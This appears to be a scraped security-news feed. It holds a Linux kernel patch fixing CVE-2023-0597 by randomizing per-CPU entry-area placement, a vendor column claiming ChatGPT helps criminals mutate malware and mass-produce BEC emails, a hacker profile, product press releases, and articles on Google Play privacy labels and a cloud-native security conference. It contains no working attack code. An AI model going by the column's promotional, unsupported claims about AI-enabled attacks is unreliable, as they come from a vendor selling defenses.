A flaw possibility of memory leak in the Linux kernel cpu_entry_area mapping of X86 CPU data to memory was found in the way user can guess location of exception stack(s) or other important data. A local user could use this flaw to get access to some important data with expected location in memory.

Seth found that the CPU-entry-area; the piece of per-cpu data that is mapped into the userspace page-tables for kPTI is not subject to any randomization -- irrespective of kASLR settings. On x86\_64 a whole P4D (512 GB) of virtual address space is reserved for this structure, which is plenty large enough to randomize things a little. As such, use a straight forward randomization scheme that avoids duplicates to spread the existing CPUs over the available space. \[ bp: Fix le build. \] Reported-by: Seth Jenkins <sethjenkins@google.com> Reviewed-by: Kees Cook <keescook@chromium.org> Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org> Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com> Signed-off-by: Borislav Petkov <bp@suse.de>

@@ -130,10 +130,6 @@ struct cpu\_entry\_area {

};

#define CPU\_ENTRY\_AREA\_SIZE (sizeof(struct cpu\_entry\_area))

\-#define CPU\_ENTRY\_AREA\_ARRAY\_SIZE (CPU\_ENTRY\_AREA\_SIZE \* NR\_CPUS)

\-

\-/\* Total size includes the readonly IDT mapping page as well: \*/

\-#define CPU\_ENTRY\_AREA\_TOTAL\_SIZE (CPU\_ENTRY\_AREA\_ARRAY\_SIZE + PAGE\_SIZE)

DECLARE\_PER\_CPU(struct cpu\_entry\_area \*, cpu\_entry\_area);

DECLARE\_PER\_CPU(struct cea\_exception\_stacks \*, cea\_exception\_stacks);

@@ -11,6 +11,12 @@

#define CPU\_ENTRY\_AREA\_RO\_IDT\_VADDR ((void \*)CPU\_ENTRY\_AREA\_RO\_IDT)

\-#define CPU\_ENTRY\_AREA\_MAP\_SIZE (CPU\_ENTRY\_AREA\_PER\_CPU + CPU\_ENTRY\_AREA\_ARRAY\_SIZE - CPU\_ENTRY\_AREA\_BASE)

+#ifdef CONFIG\_X86\_32

+#define CPU\_ENTRY\_AREA\_MAP\_SIZE (CPU\_ENTRY\_AREA\_PER\_CPU + \\

\+ (CPU\_ENTRY\_AREA\_SIZE \* NR\_CPUS) - \\

\+ CPU\_ENTRY\_AREA\_BASE)

+#else

+#define CPU\_ENTRY\_AREA\_MAP\_SIZE P4D\_SIZE

+#endif

#endif /\* \_ASM\_X86\_PGTABLE\_AREAS\_H \*/

@@ -266,7 +266,7 @@ static inline bool within\_cpu\_entry(unsigned long addr, unsigned long end)

/\* CPU entry erea is always used for CPU entry \*/

if (within\_area(addr, end, CPU\_ENTRY\_AREA\_BASE,

\- CPU\_ENTRY\_AREA\_TOTAL\_SIZE))

\+ CPU\_ENTRY\_AREA\_MAP\_SIZE))

return true;

/\*

@@ -16,16 +16,53 @@ static DEFINE\_PER\_CPU\_PAGE\_ALIGNED(struct entry\_stack\_page, entry\_stack\_storage)

#ifdef CONFIG\_X86\_64

static DEFINE\_PER\_CPU\_PAGE\_ALIGNED(struct exception\_stacks, exception\_stacks);

DEFINE\_PER\_CPU(struct cea\_exception\_stacks\*, cea\_exception\_stacks);

\-#endif

\-#ifdef CONFIG\_X86\_32

+static DEFINE\_PER\_CPU\_READ\_MOSTLY(unsigned long, \_cea\_offset);

+

+static \_\_always\_inline unsigned int cea\_offset(unsigned int cpu)

+{

\+ return per\_cpu(\_cea\_offset, cpu);

+}

+

+static \_\_init void init\_cea\_offsets(void)

+{

\+ unsigned int max\_cea;

\+ unsigned int i, j;

+

\+ max\_cea = (CPU\_ENTRY\_AREA\_MAP\_SIZE - PAGE\_SIZE) / CPU\_ENTRY\_AREA\_SIZE;

+

\+ /\* O(sodding terrible) \*/

\+ for\_each\_possible\_cpu(i) {

\+ unsigned int cea;

+

+again:

\+ cea = prandom\_u32\_max(max\_cea);

+

\+ for\_each\_possible\_cpu(j) {

\+ if (cea\_offset(j) == cea)

\+ goto again;

+

\+ if (i == j)

\+ break;

\+ }

+

\+ per\_cpu(\_cea\_offset, i) = cea;

\+ }

+}

+#else /\* !X86\_64 \*/

DECLARE\_PER\_CPU\_PAGE\_ALIGNED(struct doublefault\_stack, doublefault\_stack);

+

+static \_\_always\_inline unsigned int cea\_offset(unsigned int cpu)

+{

\+ return cpu;

+}

+static inline void init\_cea\_offsets(void) { }

#endif

/\* Is called from entry code, so must be noinstr \*/

noinstr struct cpu\_entry\_area \*get\_cpu\_entry\_area(int cpu)

{

\- unsigned long va = CPU\_ENTRY\_AREA\_PER\_CPU + cpu \* CPU\_ENTRY\_AREA\_SIZE;

\+ unsigned long va = CPU\_ENTRY\_AREA\_PER\_CPU + cea\_offset(cpu) \* CPU\_ENTRY\_AREA\_SIZE;

BUILD\_BUG\_ON(sizeof(struct cpu\_entry\_area) % PAGE\_SIZE != 0);

return (struct cpu\_entry\_area \*) va;

@@ -211,7 +248,6 @@ static \_\_init void setup\_cpu\_entry\_area\_ptes(void)

/\* The +1 is for the readonly IDT: \*/

BUILD\_BUG\_ON((CPU\_ENTRY\_AREA\_PAGES+1)\*PAGE\_SIZE != CPU\_ENTRY\_AREA\_MAP\_SIZE);

\- BUILD\_BUG\_ON(CPU\_ENTRY\_AREA\_TOTAL\_SIZE != CPU\_ENTRY\_AREA\_MAP\_SIZE);

BUG\_ON(CPU\_ENTRY\_AREA\_BASE & ~PMD\_MASK);

start = CPU\_ENTRY\_AREA\_BASE;

@@ -227,6 +263,8 @@ void \_\_init setup\_cpu\_entry\_areas(void)

{

unsigned int cpu;

\+ init\_cea\_offsets();

+

setup\_cpu\_entry\_area\_ptes();

for\_each\_possible\_cpu(cpu)

CVE-2023-0597: git/torvalds/linux.git - Linux kernel source tree

Generative AI is heating up everywhere and fundamentally changing everything we know about how cybercriminals develop and deploy attacks.

There has been a lot of talk about generative AI and chatbots like ChatGPT launching cyberattacks. What does that mean for the future of cybersecurity, and how can organizations prepare?

Threat actors are using ChatGPT to launch cyberattacks now. ChatGPT allows threat actors to increase the speed and variation of their attacks by modifying code in malware or creating thousands of variations of social engineering attacks to increase the probability of success. As machine learning technologies advance, so will the variety of ways this technology is used for malicious intent.

Generative AI is heating up everywhere and fundamentally changing everything we know about how cybercriminals develop and deploy attacks with increased speed and variations. The possible uses of AI for malicious intent are in their infancy. AI-powered technologies that leverage generative AI and diffusion models can modify the appearance of video and voice. They will most likely be used for cyberattacks, resulting in unfortunate consequences for organizations.

A race to develop new technologies leveraging AI is happening in voice (written and verbal), video, and more, as is evidenced by OpenAI's ChatGPT, Google's Bard, and Microsoft's AI-powered Bing. All are large language models that exponentially accelerate access to knowledge and rapidly generate new forms of content based on that contextualized knowledge. These tools rely on big data sets and the quality of those data sets.

While ChatGPT has the initial lead as the fastest-growing tool in history, don't bet against Google's ability to surpass ChatGPT in the future. It will certainly be a race, unlike anything we've seen before. As these new technologies become available, they will be used by organizations and cybercriminals, and both sides will use them to perpetrate and stop cybercrime. The abuse of AI is something we knew would happen for a long time, which is why SlashNext engineers have been developing natural-language generative AI technology for a few years in anticipation of these types of changes in the threat landscape.

**How Real the Generative AI Threat Is and How Organizations Can Prepare**

Generative AI, chatbots, and diffusion models are all developments in AI that present a real danger to users and businesses. Right now, ChatGPT, in particular, is a real enhancement to malware, business email compromise (BEC), and ransomware threat development. Cyberattacks are most dangerous when delivered with speed and frequency to targets.

With malware, ChatGPT enables cybercriminals to make infinite code variations to stay one step ahead of the malware detection engines. BEC attacks are target attempts to social engineer a victim into giving valuable financial information or data. These attacks require personalized messages to be successful. Now ChatGPT can create well-written, personal emails en masse with infinite variations. The speed and frequency of these attacks will increase and yield a higher success rate of user compromises and breaches. Legacy security technology doesn't stand a chance against these types of attacks. 

We must fight AI cyber threats with AI cybersecurity technology. When cybercriminals launch successful attacks, the results are massively disruptive to people, organizations, and the economy. The No. 1 cyber challenge that organizations face globally is human-focused attacks. Cybercriminals are increasing their attacks in LinkedIn, Microsoft Teams, Messenger, and Slack and taking advantage of the most vulnerable part of organizations: its people.

Many organizations are already using AI-based cybersecurity products to manage detection and response. AI technologies with generative AI will become essential technology to stop hackers and breaches. As new technology becomes available, hackers and cybersecurity vendors will use it to perpetrate and stop cybercrime. The abuse of AI is something we knew would happen for a long time, which is why SlashNext has been developing a natural-language generative AI technology for a year and a half in anticipation of these types of threats.

ChatGPT is not new, but OpenAI is the first to make an interface, so it's more accessible. ChatGPT is not the technology to fend off threats designed with ChatGPT. Still, generative AI technology, which makes ChatGPT possible, will be used to develop cyber defenses capable of stopping malware and BEC threats developed with ChatGPT. 

**About the Author**

    

Patrick Harr is the CEO of SlashNext, an integrated cloud messaging security company using patented HumanAI™ to stop BEC, smishing, account takeovers, scams, malware, and exploits in email, mobile, and Web messaging before they become a breach.

Generative AI Changes Everything We Know About Cyberattacks

Security Pro File: The old-school hacker traces a path from young hardware tinkerer to senior cybersecurity executive.

Before he was Space Rogue, before L0pht, before testifying in front of Congress about what used to be a very unknown risk of networked computers, and before he embarked on a career in cybersecurity, he was just young Cris Thomas with a homemade flashlight.

Growing up in a mobile home in rural Maine in the 1970s, Thomas didn't have a whole lot of access to technology in his early years. But at the tender age of five, armed with a hammer and a worn-out sealed alkaline flashlight — the kind that you threw away after the batteries lost their juice — he was able to first learn the basics of electrical circuits. Cannibalizing parts from those flashlights and adding C and D cell batteries and wires consisting of garbage bag twist ties, he was in business with his very own lighting device.

That kind of tinkering is the very essence of a hacker's modus operandi, and it was the start of his love affair with hacking and his eventual profession as a cybersecurity leader. Over the years, Thomas has done stints at the likes of Trustwave Security, Tenable, and almost six years now at IBM as Global Lead of Policy and Special Initiatives. But at its root his beginnings have all the same flavor of self-directed experimentation and trial-and-error with his flashlight. His route was circuitous and full of ups and downs, but he says that in some ways it was easier for him to go down that path than those trying to get their break in cybersecurity today without the traditional path straight from college.

"There's still people who are trying to break into the industry with little to no formal education, and the debate of college or certifications is still raging. So, I think getting into the industry, from an austere beginning and maybe even skipping the formal education and being self-taught — it is possible," he says. "It's a lot more difficult today, because I think people put a lot of importance on the college degree and the formal education, and so it's hard to get around that stigma."

After early grade school he moved to a bigger town, was exposed to computers in bits and pieces, and mastered the basics of BASIC from chance encounters, clubs, and high school computer class. But it wasn't until he was in the Army that he was able to buy his very own computer, a Mac SE he bought on credit from a store nearby his base. It was from this machine he dug further into programming and got synced up with his first local user group, a Mac HyperCard user group. From there he branched out into BBSs and began to tap into the burgeoning Internet hacker subculture. After the Army and a brief stint at Boston University, he took the handle Space Rogue, dialing into the Boston BBSs. Many of those had a whole underground world of in-person meet-ups attached to them. Running in those circles — plus holding down a job at a local CompUSA where a number of local hackers worked — is what would eventually lead Space Rogue to the ragtag group of hackers called L0pht.

**Remembering the L0pht**

A collective of elite hackers and a hackerspace rolled into one, the L0pht is one of those storied groups that's inextricably tied in with the infancy of the cybersecurity industry. In a book published this month, _Space Rogue: How the Hackers Known as L0pht Changed the World_, Thomas writes the memoir of his winding journey to hacking and his membership in the group.

Space Rogue was one of the earliest members and was heavily involved in the group's adventures and hacking experimentation. He was there for its evolution into what would become L0pht Heavy Industries, its release of the L0phtCrack password-cracking tool, and its eventual sale to @Stake. Together with hackers like Mudge, Weld Pond, Kingpin, Dildog, tan, and Stefan von Neumann, they were on the bleeding edge of experimentation with hardware and software — partially from scavenging corporate dumpsters for equipment, partially from soliciting donations and picking up cool finds at the MIT Flea Market, where they also sold refurbished gear to partially fund their loft space. The crew ran their own NOC, experimenting with different forms of networking, and they shared files online through the early version of the L0pht.com server. Space Rogue ran the popular Whacked Mac Archives, a collection of software collected from underground systems and BBSs over the years. He did the books and paid the bills as an unofficial chief operating officer and was also instrumental in helping raise the profile of the group by founding and running Hacker News Network and helping to coordinate a lot of its work with the media.

The work the L0pht did for a very long time was simply a labor of love — the hackers had day jobs. In their off-hours time of experimentation they started learning how truly vulnerable systems are to manipulation and exploitation in ways unexpected by their creators. As the team evolved, they started picking up gigs writing custom signatures for the first incarnations of intrusion detection systems, issued advisories about vulnerabilities on their website and Bugtraq, and were courted by firms to do pen testing. For a long time they barely broke even, but their security chops did gain the attention of the federal government, and in 1998 Space Rogue and six other core members of the L0pht stepped in front of a Congressional panel to give one of the earliest public warnings about the state of insecurity of the online world.

Thomas does a great job detailing all of these happenings in his book, which offers a very personal and open account of his perspective on how things unfolded. He does a great job highlighting the personalities and mindsets of the different hackers he worked with or came across over the years, and is very relatable and vulnerable offering thoughts on his maturing perspectives on dealing with not just systems but also people. Readers get to follow along with his close connections with hacker friends, fallouts and reconciliations, and run-ins with difficult bosses, as well as career disillusionment and rebirth.

**What's in a Handle?**

Musing about the L0pht and his book recently, he notes that while his unconventional learnings and rise through cybersecurity could probably be emulated by newcomers, the rise of L0pht itself occurred during a very unique era in time and would be a whole heck of a lot more difficult to recreate.

"I mean, you can get a bunch of people together and rent some space and do some stuff, but getting the same attention would be harder because the bugs are harder to find now," he says. He explains that what L0pht did wasn't easy, but they found the low-hanging fruit in security flaws.

They also had a lot less red tape and legal and professional standards to navigate. Doing what they did back in the 1990s today would put most cybersecurity researchers in a lot of hot water.

"There's a lot more risk involved. I mean, there was risk then too, but if you're going to release information about a zero-day vulnerability to the public without a pseudonym, the risk of lawsuits is pretty high. Which is, again, one of the reasons why we were using the handles and the pseudonyms to begin with. But staying pseudonymous is a lot more difficult today than it was."

Thomas still cherishes and uses his Space Rogue handle — it's part of his online and professional persona. For example, his email address at IBM is based on that handle rather than his real name.

"I built a reputation as Space Rogue within the industry. I was the last member of the L0pht to actually start using their given name in professional settings," he says. "So it's only been a few years for me, really, that people have looked at the handle and been able to equate it to the given name easily."

These days, Mudge is known as Peiter Zatko, who worked at DARPA and Google in key roles, and most recently in the news as the Twitter whistleblower who drew attention to the social network's lacking security stance. Weld Pond is Chris Wysopal, who co-founded Veracode. Kingpin is Joe Grand, a well-known security researcher and author who runs Grand Idea Studio. But when they see each other, they'll always be Mudge, Weld, and Kingpin to him.

"And for the most part, people still address me as Space Rogue or SR. At work, people call me Space, and occasionally I'll get Mr. Rogue, but that's usually as a joke," he says. "My wife actually referred herself in a Twitter thread the other day as Mrs. Space Rogue."

**Looking Back at Industry Change**

All kidding aside about handles, Space Rogue is still as much of a concerned industry watcher as those days back at the L0pht, stepping in front of federal lawmakers.

"I've always been interested in policy and how legal ramifications are impacting the online world. Right now, I'm following a lot of actions of CISA, and I have to say that as a nation we're actually doing a great job," he says. "In the past, government has been behind schedule and playing catch-up, but I think CISA's actually taken a very good, proactive approach, which is a welcome change in the industry."

At the same time, though, he says that there's this dichotomy in cybersecurity where over the last 25 years, everything has changed but is also still the same. There's a ton more awareness now, not just from policy makers or industry insiders but just individual workers or non-tech business executives, about things like ransomware or phishing.

"Most people have to go through some sort of security training in their job, so the awareness factor is much higher," he says.

At the same time, though, the cybersecurity world is still knocking its head against the same problems it did decades ago.

"We're making stupid mistakes. We're using default passwords. We're designing flat networks. And these are the same problems that we had 25 years ago," he says. "So, it's a little bit of some and a little less of some other stuff. A lot of things have changed and gotten better, but a lot of things have still stayed the same as well."

**PERSONALITY BYTES**

**What he does for fun:** A lot of treasured hobbies mirror his hacking interests — his fun project at the moment is setting up a Raspberry Pi for his son to help him learn Python and picoCTF. "You can't get Raspberry Pis at the moment, so I've had to cannibalize some of my old projects to get him one that he can use."

**Non-hacking hobbies:** There was a time he was into making hard cider, but he moved and had less room for all of the equipment. Now he's turned his sights to rock tumbling. "My youngest got a rock tumbler last year and never used or was very interested in it. And I was like 'Well, if you're not going to use it, I'm going to.' Now I have four tumblers and I'm rotating rocks in the basement all the time."

**Quirky tidbits:** He says he's kind of an open book, and shares a lot of fun stuff with co-workers via Slack, so there's nothing they'd be surprised to know about him. But like many folks in the industry, he's got his quirky interests. "I'm a big Saturn car aficionado."

**Favorite day-to-day drink:** "I drink a lot of caffeine-free Diet Coke."

**How he tells people what he does for a living:** Per his book, he wrote, "I rarely blurt out 'Hi, I’m a hacker' when I first meet people. Trying to explain to people what I do for work can sometimes be tricky and lead into all sorts of long and sticky conversations, so I usually just say I work in computers."

Cris Thomas: Space Rogue, From L0pht Hacker to IBM Security Influencer

Eliminate passwords in user authentication workflow with Vault Vision's passkey features like facial recognition, fingerprint and pin verification on all modern devices.

**DENVER, Feb. 22, 2023 /PRNewswire-PRWeb/ --** Vault Vision, a leading user  
authentication platform for developers announced the launch of passkey  
authentication technology enabling secure and convenient logins on modern  
devices. Legacy passwords are central to website and app security, but 81% of  
hacking-related breaches leveraged either stolen and/or weak passwords. A Google  
study found that 75% of Americans are frustrated with passwords and 43% have  
shared their password with someone. Passkey auth aims to solve an inherent  
weakness in passwords with support from Apple, Google and Microsoft on all  
modern browsers and devices.  
For application users, passkey is an easier replacement for passwords. With  
passkey, users can sign in to applications with biometric authentication such as  
a fingerprint or facial verification, PIN, or pattern, unlocking them from  
having to remember and manage passwords. A user can sign into applications on  
all modern devices using a passkey, which can be created on a mobile phone and  
used to sign in to a website on a separate laptop. Passkey authentication makes  
it phishing-resistant and brute force attacks, and one the most secure  
authentication methods available today. Vault Vision's one click passwordless  
login drastically improves the user registration and login workflow with the  
addition of passkey.

For developers, Vault Vision's user authentication platform enables easy  
integration of passwordless logins into any website or application built on  
React, Node, Python, Go and low code platforms like Webflow. Developers can  
leverage Vault Vision's open sourced examples available as GitHub repos in  
React, Node, Python and Go, which can be deployed with auto-generated and  
pre-set copy-and-paste environment configuration stanzas. These repos offer an  
implementation insight into the integration flows with auth use cases. "Vault  
Vision is the only passwordless-first auth platform that does not require a  
password during setup." said Neil Proctor, CEO and Founder, Vault Vision. "Our  
technology enables developers to register without passwords and start creating  
local development environments with our user auth in less than a minute. For end  
users, the convenience of passwordless login drives user registration and login  
growth with facial recognition, fingerprint & pin based verification on all  
modern devices".  
The addition of passkey auth and passwordless logins makes Vault Vision's one of  
the most secure authentication platform with its privacy-first architecture.  
Vault Vision is the only authentication platform that protects end user privacy  
from password breaches by eliminating use of third-party scripts and low quality  
sdk's. With the average authentication tool employing an average of eight  
tracking elements, Vault Vision maintains zero third-party dependence  
eliminating vendor breach risk for developers and the ability to operate in  
air-gapped and secure operating environments.  
Vault Vision offers free developer sandboxes and expert help with your free  
trial, learn more here.**About Vault Vision**  
Vault Vision is a no code user authentication platform that enables developers  
to easily deploy user auth & passwordless logins on React, Python, Go, Node  
applications and low code platforms like Webflow. Vault Vision's authentication  
technology increases login engagement and drives user registration growth with  
OpenID Connect (OIDC), FIDO2 and passkey logins. End users benefit from Vault  
Vision's convenient authentication features like passkey facial recognition,  
fingerprint, pin based verification, OIDC logins for Apple, Google and  
Microsoft, two-factor auth (2FA), multi-factor auth (MFA), universal time-based  
one-time password (TOTP) auth, SSO with email and hardware key auth. Vault  
Vision's is a FIDO Alliance member and its user authentication technology is  
OpenID Certified.

Vault Vision Launches One Click Passwordless Logins With Passkey User Authentication

As a data security solution focused solely on SaaS ecosystems, Metomic will use the Series A funding round to expand into the U.S.

**London, England, February 22, 2023 –** Metomic, a next generation data security solution for protecting sensitive data in the new era of collaborative SaaS, announced today it has raised a $20 million Series A funding round. The round is led by Evolution Equity Partners with participation from Resonance and Connect Ventures. The investment will be used for U.S. expansion efforts and research and development initiatives. It will also allow Metomic to double down on its AI technology, furthering its mission to enable safer, more compliant data sharing across collaborative software-as-a-service (SaaS) ecosystems. 

Security, privacy and compliance teams use Metomic’s no-code workflows to automate data policies across their SaaS applications. This includes the ability to deliver real-time notifications directly to employees when they have uploaded sensitive data into the wrong environment, essentially enabling a human firewall across the organization.

Metomic’s funding round comes at a critical time as the SaaS ecosystem continues to grow. Research shows that SaaS app usage was up 18% last year, with businesses using, on average, more than 130 SaaS tools across the organization. The challenge comes from the lack of visibility and control companies have over what data employees are uploading in SaaS apps, and whom they are sharing it with. The result: PII (personally identifiable information), confidential information, and security credentials are being stored and exposed unnecessarily – often by accident. This presents a real risk and pain for organizations that rely on the productivity benefits of SaaS, but need to control and protect their most sensitive data. 

Metomic is giving organizations visibility and control of their data across collaborative SaaS applications, including Google Apps, Slack, Jira, and Zendesk by connecting to the data layer of these popular work tools. It allows security professionals to see what data is being stored, where it is, and who has access to it. Metomic’s automated processes are having a groundbreaking effect on how modern companies protect sensitive data at scale. 

"Security, IT and compliance teams have no visibility into the data employees are storing and sharing across third-party SaaS applications. They are suffering from alert fatigue and are overwhelmed with the amount of notifications they have to address,” said Rich Vibert, CEO and Co-Founder, Metomic. “By triaging critical risks and putting remediation in the hands of employees, we give security teams the most effective, scalable, and modern way to protect their most vulnerable data, without getting in the way of high-value work.” 

In the last 18 months, Metomic’s automated platform has prevented more than two million data leak threats lurking in SaaS ecosystems. Even more astonishing, it has detected hundreds of millions of sensitive data points within SaaS apps and found that 99% of the sensitive data does not need to be there or is accessible to people who shouldn’t have access.

"Businesses adopt SaaS applications at a rapid pace. While SaaS tools increase employees’ productivity and enable collaboration among colleagues and partners, IT security teams have limited visibility and control over sensitive data stored within these apps,” said Yuval Ben-Itzhak, Partner, Evolution Equity Partners. “Metomic gets it. We believe their approach to SaaS data security can fill the gap by helping security teams control sensitive data and remain in compliance with regulations."

"Evolution Equity are great partners for Metomic," added Vibert. "As cybersecurity investors, they not only knew the space, but immediately understood the business value of our technology. We connected on the need to protect information at the data level inside SaaS, one of the fastest growing niches in cybersecurity today."

Currently, Metomic has customers across Europe and North America, with 50% of its customers based in the U.S. It plans to quadruple employee headcount by the end of the year, with its sales and marketing functions headquartered in the U.S. 

**About Metomic:** 

Metomic was born out of the frustration of its leaders trying to implement SaaS applications that make businesses more productive but are off limits because of high-risk security concerns. As a next generation security solution focused on cloud-based applications, Metomic gives security teams clear visibility into their organization’s SaaS network to manage sensitive data and detect security threats, allowing businesses to take full advantage of their SaaS application network. To learn more visit www.metomic.io.

Metomic Raises $20 Million to Protect Sensitive Data in SaaS Applications

Mozilla researchers found that apps often provide inaccurate data use disclosures, giving people “a false sense of security.”

It's basically impossible to keep track of what all your mobile apps are doing and what data they share with whom and when. So over the past couple of years, Apple and Google have both added mechanisms to their app stores meant to act as a sort of privacy nutrition label, giving users some insight into how apps behave and what information they may share. These transparency tools, though, are populated with self-reported information from app developers themselves. And a new study focused on the Data Safety information in Google Play indicates that the details developers are providing are often inaccurate.

Researchers from the nonprofit software group Mozilla looked at the Data Safety information of Google Play's top 40 most-downloaded apps and rated these privacy disclosures as “poor,” “needs improvement,” or “OK.” The assessments were based on the degree to which the Data Safety information did or did not align with the information in each app's privacy policy. Sixteen of the 40 apps, including Facebook and Minecraft, received the lowest grade for their Data Safety disclosures. Fifteen apps received the middle grade. These included the Meta-owned apps Instagram and WhatsApp, but also the Google-owned YouTube, Google Maps, and Gmail. Six of the apps were awarded the highest grade, including Google Play Games and _Candy Crush Saga_.

“When you land on Twitter’s app page or TikTok’s app page and click on Data Safety, the first thing you see is these companies declaring that they don’t share data with third parties. That’s ridiculous—you immediately know something is off,” says Jen Caltrider, Mozilla’s project lead. “As a privacy researcher, I could tell this information was not going to help people make informed decisions. What’s more, a regular person reading it would most certainly walk away with a false sense of security.”

Google mandates that all app developers submitting to Google Play complete the Data Safety form. The rationale is that the developers are the ones who have the information on how their product handles data and interacts with other parties, not the app store that facilitates distribution. 

“If we find that a developer has provided inaccurate information in their Data Safety form and is in violation of the policy, we will require the developer to correct the issue to comply. Apps that aren’t compliant are subject to enforcement actions,” Google told the Mozilla researchers. The company did not address questions from WIRED about the nature of these enforcement actions or how often they have been taken.

Google refutes the researchers' methodology, though. “This report conflates company-wide privacy policies that are meant to cover a variety of products and services with individual Data Safety labels, which inform users about the data that a specific app collects,” the company says in a statement. “The arbitrary grades Mozilla Foundation assigned to apps are not a helpful measure of the safety or accuracy of labels given the flawed methodology and lack of substantiating information.”

In other words, Google is saying that the Mozilla researchers misunderstood the scope of the privacy policies they were looking at or even consulted the wrong policies entirely. But the researchers say the privacy policies they used in their analysis are the exact policies each app developer links to on Google Play, indicating that they apply to the apps in question.

“Google's own response to our research highlights the exact problem we highlighted,” Mozilla's Caltrider says. “What information are consumers to trust and rely on if the self-reported information from app developers in the Data Safety section is different from the privacy policies linked on the same app page? Ultimately, our goal is to help Google give consumers what they need to make informed decisions about their privacy. This starts with Google improving their Data Safety information.”

The report also lays out how Google's current Data Safety form creates blind spots and opportunities for developers to leave out information about how their apps behave and share user data. For example,  the form has broad exemptions for app developers to report data sharing with “service providers” and for “specific legal purposes.” And the researchers found that the definitions Google uses for the words “collection” and “sharing” are narrow, meaning that developers may not be required to report activity that users would think of as data collection and sharing. Additionally, the researchers note that Google doesn't require app developers to disclose data collection when the information is being anonymized. This is noteworthy because of debates over whether it is possible to truly anonymize data as well as a long track record of app developers making mistakes or using flawed schemes in their attempts to anonymize data.

Both Google and Mozilla's researchers note that Google Play's Data Safety mechanism is still new. And the researchers say it can be refined to be a valuable indicator for users. Without urgent reform, though, they argue that the Data Safety information is currently doing more harm than good by giving users an inaccurate privacy picture of what's going on inside their apps.

You Can’t Trust App Developers’ Privacy Claims on Google Play

CloudNativeSecurityCon North America 2023 was a vendor-neutral cloud-native security conference. Here's why it was important.

Cloud-native technology is growing in importance, and the Cloud Native Computing Foundation (CNCF), part of the Linux Foundation, is a key organization driving collaboration on cloud security throughout the industry.

That collaboration includes events such as KubeCon Americas and Europe, which often feature cloud-native security as a key topic, but seeing the importance of cloud native security, CNCF took the next step and created a separate event.

CloudNativeSecurityCon North America 2023 (CNSC) recently took place in Seattle, and served as the first vendor-neutral, practitioner-driven conference focused exclusively on cloud-native security. The event featured over 800 attendees and 50 sponsors. It had 70-plus sessions for all security levels of technologists.

**Security Is People-Powered; Industry Collaboration Is a Solution**

Security remains a pressing issue for the cloud-native and open source community, said Priyanka Sharma, Executive Director, CNCF. During her keynote, she said there are 7.1 million-plus cloud-native developers according to Slash Data.

She emphasized that the industry needs "a paradigm shift to level up our performance," as cloud usage will continue to grow, and so will the threats related to it.

Though the organizations are doing their part to secure their cloud environments, Sharma indicated that top-down approach may not be the best way, instead having a more bottom-up approach from the community, pointing to software security vendor Snyk's "2022 State of Cloud Security Report," which showed 77% of organizations saw poor training and collaboration as a major cloud security challenge.

    

Source: CNSC

Having siloed teams working in different countries, using different tools, and counting on unmonitored policies are common security challenges in many enterprise security scenarios, but when they involve the cloud, it multiplies difficulties to the security environment further. Hence, Sharma stated, "Security is people-powered," and having industry-level collaboration from all the stakeholders along with a shared asset directory will improve cloud security across the industry. Even after all the talks about innovation and right approach done in the cloud-native space, a skill shortage is something the industry is still facing. CNCF announced Kubernetes and Cloud Associate (KCSA) certification, to address the biggest challenge of lack of technical expertise in cloud-native environment.

CNCF organizes itself with Technical Advisory Groups (TAGs) for different focus areas, and it is looking to a Security TAG to help organizations with facilitating the security for projects across the cloud-native ecosystem. It's a 165-member team that supports CNCF projects through education, partnership, and project engagement. This group will help with security features for any CNCF projects; any incubating project within the organization must now go through a security audit by the Security TAG. The Sigstore project that was adopted by Kubernetes was an example of such open, multivendor collaboration.

**Key Conference Topics**

Themes that popped up during the event — including SBOM, runtime security, infrastructure as-a-code security, code to secure policies and authentication, and ChatGPT — indicated that the adoption of cloud-native applications will continue to grow, and the industry must prioritize security for these applications. The thought of having an open source security tool for securing open source code makes sense. Today, CNCF has 21 security-related open-source projects: Open Policy Agent (OPA) and Update Framework TUF have graduated with five other incubating projects, and the rest are in the sandbox stage.

**Software Supply Chain Security**

    

Source: CNSC

Many sessions at the conference were focused on understanding what the software supply chain means and why securing it remains important.

A talk by a Yahoo representative highlighted how 85% to 97% of enterprise code uses open source components, and any vulnerabilities in these may pose security threats. That issue underscores the importance of having security ingrained at every stage of the software development life cycle (SDLC), from application development to CI/CD pipeline down to production.

Code dependencies have become one of the most common reasons leading to supply chain attacks. According to a recent report on software supply chain security, supply chain attacks have grown 742% year-over-year in the past three years. Therefore, a DevSecOps approach is important to ensure the DevOps workflow is maintained by making security seamless. It means having security as an intrinsic part of application development, integration, and operation in DevOps-centric environments.

**"Shift Right" Is as Important as "Shift Left"**

Deployment of applications in the cloud has been a fast-track initiative for many enterprises, often in support of digital transformation initiatives, but many of the same security challenges, such as software vulnerabilities, managing configuration and permission, compliance, and detecting and responding to threats, plaguing traditional applications also hamper cloud application security.

From the cloud-native point of view, two trends are most visible. The first is the way in which "shift left" corresponds to the usage of CI/CD security, having centralized responsibilities and dependencies that can be monitored. It points to moving security toward an earlier stage in the software development life cycle, namely that security is built in from the time the source code is created.

But the second trend is "shift right," which is gaining equal importance in understanding what is going on in the runtime environment as the workload deployed on microservices and orchestrated by Kubernetes. The Falco project with CNCF (originally started by Sysdig), which is based on eBPF technology, seeks to help organizations understand what every process is doing in its containers and hosts. It is like a security camera for the cloud environment.

**Software Bill of Materials**

Log4j was a top of mind during the show, highlighting how it disrupted the operations of many organizations in so many different ways.

Similar high-profile attacks on the supply chain were the reason for the US federal government to issue an executive order to create guidelines for securing software solutions used for the government. The change of approach to building software using third-party dependencies makes having full transparency in the application important.

So, the approach of maintaining a software bill of materials (SBOM) that will offer a listing all components, modules, and libraries used in the application and also drawing the relationship between supply chain components is becoming increasingly important.

One interesting exchange during the conference tackled how to handle metadata that will be collected over time by each software element. In a panel, a Google representative mentioned its new product, Graph for Understanding Artifact Composition (GUAC), which functions like an aggregator for this metadata in a high-fidelity graph database.

**Sponsor Landscape**

    

Source: Omdia

CNSC was a relatively small-scale conference, but its sponsors represented vendors distributed across the industry. Approximately 55% were security vendors, 18% technology vendors offering some security, 12% were technology vendors that use in-house security product but do not sell the security product as a stand-alone offering, and 15% non-security vendors.

**A Strong Start**

The first-ever CNSC was a strong start for the cloud-native community to create a place to gather each year for a focused look at security challenges and opportunities in cloud-native environments.

CNCF is doing a great job getting different types of vendors together and supporting cloud-native security projects. This is exposing developers to security concerns. On the contrary, traditional security teams also must learn to work better with developers and ensure security approaches align with development priorities and business objectives.

This is just a first step toward solving the problems related to cloud-native security. There is more collaboration with people and process to be done in future.

